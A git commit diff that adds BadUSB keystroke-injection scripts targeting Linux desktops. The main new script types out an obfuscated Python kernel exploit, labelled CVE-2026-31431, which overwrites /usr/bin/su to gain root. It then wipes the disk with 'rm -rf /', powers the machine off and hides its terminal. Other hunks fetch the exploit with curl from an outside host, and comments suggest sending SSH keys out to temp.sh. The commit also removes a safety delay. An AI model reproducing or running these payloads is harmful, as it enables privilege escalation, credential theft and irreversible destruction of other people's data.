Added typed version to remove curl dep

2026-05-01 23:49:18 +01:00
parent 188caaa434
commit d2b1466f24
3 changed files with 68 additions and 39 deletions
--- a/badusb/CVE-2026-31431-typed.txt
+++ b/badusb/CVE-2026-31431-typed.txt
@@ -0,0 +1,61 @@
+REM This is BadUSB demo script for Linux/Gnome
+REM #############################
+REM ####### DANGER !! ###########
+REM #############################
+REM This script will wipe a linux machine unpatched to CVE-2026-31431
+REM launch via GUI evokes terminal through 2 methods then runs attack and wipes root with rm rf
+
+REM GUI launch terminal in kde gnome plasma
+DELAY 500
+GUI
+STRING terminal
+ENTER
+DELAY 500
+
+REM launch via hotkeys for terminal
+DELAY 500
+CTRL-ALT T
+DELAY 200
+ENTER
+ENTER
+
+REM Clear the screen in case some banner was displayed
+STRING clear
+ENTER
+
+REM Bigger shell script example
+STRING cat > /tmp/cve.py << EOF
+ENTER
+
+STRING #!/usr/bin/env python3
+STRING import os as g,zlib,socket as s
+STRING def d(x):return bytes.fromhex(x)
+STRING def c(f,t,c):
+STRING  a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
+STRING  try:u.recv(8+t)
+STRING  except:0
+STRING f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
+STRING while i<len(e):c(f,i,e[i:i+4]);i+=4
+STRING g.system("su")
+ENTER
+STRING EOF
+ENTER
+
+REM Run exploit command
+STRING python3 /tmp/cve.py
+ENTER
+DELAY 200
+
+REM add any other exploits here whilst your root, dump ssh keys via https://temp.sh/ 
+REM clean up after
+
+STRING rm -rf / && poweroff > /dev/null 2>&1 &
+ENTER
+
+REM detach from the process and close terminal to hide
+DELAY 200
+STRING disown
+ENTER
+DELAY 200
+STRING exit
+ENTER
--- a/badusb/CVE-2026-31431.txt
+++ b/badusb/CVE-2026-31431.txt
@@ -31,12 +31,13 @@ ENTER
 REM add any other exploits here whilst your root, dump ssh keys via https://temp.sh/ 
 REM clean up after

-STRING rm -rf /
-REM add 5s delay enough time to think about it before hitting enter or control c
-DELAY 5000
+STRING rm -rf / && poweroff > /dev/null 2>&1 &
 ENTER

-REM poweroff to hide the crash afer 3 seconds and shell will run when rm is done
-DELAY 3000
-STRING poweroff
+REM detach from the process and close terminal to hide
+DELAY 200
+STRING disown
+ENTER
+DELAY 200
+STRING exit
 ENTER
--- a/badusb/payload.txt
+++ b/badusb/payload.txt
@@ -1,23 +1,3 @@
-REM #############################
-REM ####### DANGER !! ###########
-REM #############################
-REM This script will wipe a linux machine unpatched to CVE-2026-31431
-REM launch via GUI evokes terminal through 2 methods then runs attack and wipes root with rm rf
-
-REM GUI launch terminal in kde gnome plasma
-DELAY 500
-GUI
-STRING terminal
-ENTER
-DELAY 500
-
-REM launch via hotkeys for terminal
-DELAY 500
-CTRL-ALT T
-DELAY 200
-ENTER
-ENTER
-
 REM make attack file and exec

 STRING curl https://copy.fail/exp -o cve.py
@@ -28,16 +8,3 @@ STRING python3 cve.py
 ENTER
 ENTER

-REM add any other exploits here whilst your root, dump ssh keys via https://temp.sh/ 
-REM clean up after
-
-STRING rm -rf / && poweroff > /dev/null 2>&1 &
-ENTER
-
-REM detach from the process and close terminal to hide
-delay 100
-STRING disown
-ENTER
-delay 100
-STRING exit
-ENTER